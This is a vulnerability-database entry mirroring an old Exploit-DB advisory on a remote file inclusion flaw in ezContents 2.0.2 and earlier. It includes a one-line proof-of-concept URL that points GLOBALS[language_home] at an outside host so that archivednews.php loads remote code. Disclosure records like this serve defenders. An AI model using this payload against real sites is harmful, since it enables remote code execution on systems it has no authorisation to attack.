Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbCedric CochinEDB-ID:23684
HistoryFeb 11, 2004 - 12:00 a.m.

VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion

2004-02-1100:00:00
Cedric Cochin
www.exploit-db.com
18

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9638/info
 
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
 
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.

http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents

Related

nvd 2
cve 2
securityvulns 1
cvelist 2
exploitdb 1
prion 1
nvd
nvd
CVE-2004-0132
2004-03-03 05:00:00
CVE-2008-3575
2008-08-10 20:41:00
cve
cve
CVE-2004-0132
2004-03-03 05:00:00
CVE-2008-3575
2008-08-10 20:41:00
securityvulns
securityvulns
PHP Code Injection Vulnerabilities in ezContents 2.0.2 and prior
2004-02-11 00:00:00
cvelist
cvelist
CVE-2004-0132
2004-02-14 05:00:00
CVE-2008-3575
2008-08-10 20:00:00
exploitdb
exploitdb
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
2004-02-11 00:00:00
prion
prion
Remote file inclusion
2008-08-10 20:41:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23684
nvd2cve2securityvulns1cvelist2exploitdb1prion1